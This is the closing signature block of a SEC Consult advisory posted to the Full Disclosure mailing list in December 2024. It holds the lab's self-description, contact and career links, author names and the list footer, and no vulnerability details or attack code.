The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger, Tobias Niemann, Johannes Greil / @2024

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Source: https://seclists.org/fulldisclosure/2024/Dec/2